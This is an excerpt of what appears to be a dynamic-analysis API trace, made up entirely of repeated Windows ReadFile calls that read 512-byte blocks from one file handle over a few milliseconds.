	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.416] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.417] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.418] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.419] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.420] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
